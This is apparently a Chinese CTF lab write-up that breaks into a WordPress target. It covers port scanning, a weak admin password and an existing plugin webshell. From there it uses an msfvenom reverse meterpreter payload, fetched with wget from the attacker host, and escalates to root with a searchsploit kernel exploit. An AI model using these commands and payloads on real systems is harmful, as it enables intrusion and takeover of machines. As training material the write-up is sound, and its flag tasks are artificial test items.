一、题目

任务编号	任务描述	FLAG
1	使用 nmap 扫描靶机系统，将靶机21-27017开放的端口号按从小到大的顺序作为 flag 提交。flag格式:flag[端口1,端口 2···,端口 n)
2	通过上述端口访问靶机系统，使用弱口令进行登录，将正确的用户名和密码作为 fag 提交。flag 格式:flag用户名，密码]
3	使用弱口令进行登录找到后台存在webshell后门文件url路径作为flag提交flag格式：flag{wordpress/**/**/**.php}
4	利用 Kali 渗透机生成反弹木马，将生成木马命令执行后提示的第四行的首个单词作为flag 提交。flag 格式:flag[单词}
5	对上述木马文件进行修改后上传到靶机系统中，使用 MSF 开启监听，将获得的当前权限的用户名作为flag 提交。flag 格式:flag(用户名}
6	查看系统内核版本信息，将系统内核版本号作为 flag 提交。flag 格式:flag版本号)
7	在 Kali 攻击机中查找可使用的漏洞源码或者exp，将找到的漏洞源码文件名或者 exp 作为flag 提交。flag 格式:flag(文件名)
8	利用上述漏洞源码后获得到的靶机/root 下的唯一.txt 文件的文件名作为 flag 提交。flag 格式:flag(文件名]
9	利用上述漏洞源码后将获得到的靶机/root 下的唯一.txt 文件的文件内容作为 flag 提交flag 形式:flagf文件内容}

二、攻击过程

1. 使用arp-scan确定靶机的ip

arp-scan -l

2. 使用nmap扫描靶机开放的端口

nmap -sS -sV -p- --min-rate 10000 192.168.88.182

3. 发现80端口是开启的，使用目录扫描工具dirb扫描一下

dirb http://192.168.88.182 -o web.txt

4. 使用工具扫描wordpress

whatweb http://192.168.88.182/wordpress
wpscan --url http://192.168.88.182/wordpress

5. 发现后台是弱口令，登录成功

• 账号：admin
• 密码：123456

6. 在插件目录发现后门存在
后门地址为：http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php
并且可以执行系统命令，权限为www-data

7. 使用kali的msfvenom生成shell

msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o /root/shell/webshell.elf -a x64 LHOST=192.168.88.128 LPORT=8956

8. 启动nginx，把shell放在对应的目录下

cp shell/webshell.elf /html/webshell.elf

9. 通过system后门执行命令寻找有权限的地方 

view-source:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php?cmd=ls -l

发现/tmp这个目录下有权限

10. 通过wget命令下载我们准备好的后门文件

wget -P /tmp -b http://192.168.88.128/webshell.elf
view-source:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php?cmd=wget -P /tmp -b http://192.168.88.128/webshell.elf

11. 下载好后，查看并且添加执行权限 

view-source:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php?cmd=ls -l /tmp
view-source:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php?cmd=chmod 777 /tmp/webshell.elf

12. 打开msfconsole进行监听 msfconsole

use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set LHOST 192.168.88.128
set LPORT 8956

13. 启动监听

run

14. 在浏览器的命令窗口执行shell 

view-source:http://192.168.88.182/wordpress/wp-content/plugins/akismet/index.php?cmd=/tmp/webshell.elf

15. 成功反弹shell

16. 查看系统版本

sysinfo

17. 使用searchsploit进行漏洞查找

searchsploit 3.13.0

18. 导出对应文件

searchsploit -m linux/local/37292.c

19. 使用msfconsole上传到靶机对应有权限的目录

upload /root/37292.c      #上传命令 指定的是本地的文件位置

20. 进入shell，编译文件

shell
gcc 37292.c

21. 执行文件

./a.out

22. 成功拿到root权限

三、附录

1. wordpress目录结构

主目录 

[文件夹] wp-admin
[文件夹] wp-includes
[文件夹]wp-content
index.php
license.txt
readme.html
wp-activate.php
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-cron.php
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php

wp-content目录下 

[文件夹] themes 主题
[文件夹] plugins 插件
[文件夹] uploads 上传的图片和媒体文件
index.php

2. msfvenom使用

3. nginx

nginx   启动
nginx -s stop  停止
nginx -t  查看配置文件的位置